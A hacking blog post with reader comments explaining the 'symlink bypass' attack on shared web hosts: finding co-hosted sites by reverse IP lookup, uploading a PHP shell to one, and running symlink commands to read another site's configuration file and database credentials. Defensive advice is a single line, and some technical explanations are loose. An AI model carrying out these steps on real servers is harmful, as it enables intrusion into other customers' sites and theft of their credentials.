Hacker, Researcher and Author.

How Hackers Are Hacking Into Websites On Shared Hosts - Symlink Bypass Explained

You might have noticed a tremendous increase number of hack attacks on wordpress, joomla blogs and other content managing systems. What the hackers are doing is that instead of targeting the CMS itself meaning wordpress or joomla. They are targeting a vulnerable website on a server, Once they gain access to a single vulnerable website on the server, They upload a shell and with a method called "Symlink Bypass". They manage to extract the configuration files of another website hosted on that same server and later on using a simple MySQL interface they connect to that website.


Avinash, a security student and researchers will explain step by step how hackers hack into websites on shared host with the method called Symlink bypassing.

What Is Symlink Bypass?

Well, I would not like to go into much detail. However for your understanding all you need to know is that symlink is a method to refrence other files and folders on linux. Just like a shortcut in windows. Symlink is necessary in order to make linux work faster. However symlink bypassing is a method which is used to access folders on a server which the user isn't permitted. For example the home directory can only be accessed by a root level user. However with symlink bypass you can touch files inside home directory.


Step 1 - The hackers searches for a vunerable website on a server. A hacker can get list of domains on a webserver by doing a reverse iP lookup.

Step 2 - Next the hacker hacks into any vulnerable website on the server and upload a PHP shell.


Step 3 - The above picture demonstrates two files one named .htacess and the second named jaugar.izri being uploaded to the server. Here is what Jaugar.izri looks like when it's made public by adding 0755 permissions.



Step 4 - The hacker connects to the izri script and then gives the following commands

mkdir 1111
cd 1111
ln -s / root
ls -la /etc/valiases/(site.com)


The first command creates a directory named 1111(Mkdir 1111). The next command navigates to the directory(cd 1111). The third command creates the symlink of the root. The fourth command will extract the user name of the website you put in place of site.com. 


The target website is entered in ls - la /etc/valiases/site.com.











The above screenshot explains the whole story. The hacker then navigates to the "1111" directory and the configuration file of the target website is created there. The hacker downloads the configuration files and uses the information to access the database and there he can make any changes. 


                                        





How To Be Protected?

There is nothing much you can do it on your end, else then renaming your config and moving it to a safer place. If you are worried about your website's security, Feel free to contact me. 



About The Author:


Avinash is a security researcher and a blogger. He runs a blog http://avisuni.blogspot.com, where her writes about hacking. He promises to be a regular contributer here at RHA and RHA welcomes talent. 

12 comments:

  1. #All the best avinash and welcome to RHA Authors Family

    Nice heading to learn but seems to me this is little bit advance for newbies how ever thank you very much

    #Regards
    $M.Gazzaly
    $ http://greenhathacker.blogspot.com

    ReplyDelete
  2. Very nice to see your post here on RHA avinash..! Keep going Good work...!

    ReplyDelete
  3. Thanks Srikanth Rao & Sushant

    ReplyDelete
  4. well love to do it manual but :p there are l0ts 0v t00lz ;P

    ReplyDelete
  5. superhitbusiness.com
    is example of a website which was hecked 2 months ago now contains nothing

    ReplyDelete
  6. Really crazy yar
    watch more on
    http://www.gtuhacker.blogspot.com

    ReplyDelete
  7. Find Vulnerable websites on a shared hosted server with logontube.com

    The best reverseip lookup service

    http://logontube.com

    ReplyDelete
  8. i didn't understand a thing in here.. i know how to get access to server by shell uploading but then what steps he used.. and what tool he used for symblink bypass.. i need a proper tutorial for this

    ReplyDelete
  9. Really a Nice Tutorial.
    Thanks For Sharing :)

    ReplyDelete
  10. I can explain a method to gain access to more than just one site but every hosted site and beyond by combining symlink and cpanel!!! IAnd in fact you fo not need to aearch for werk site but simply bye hosting on the target server.

    ReplyDelete

© 2016 All Rights Reserved by RHA Info Sec. Top

Contact Form

Name

Email *

Message *

Powered by Blogger.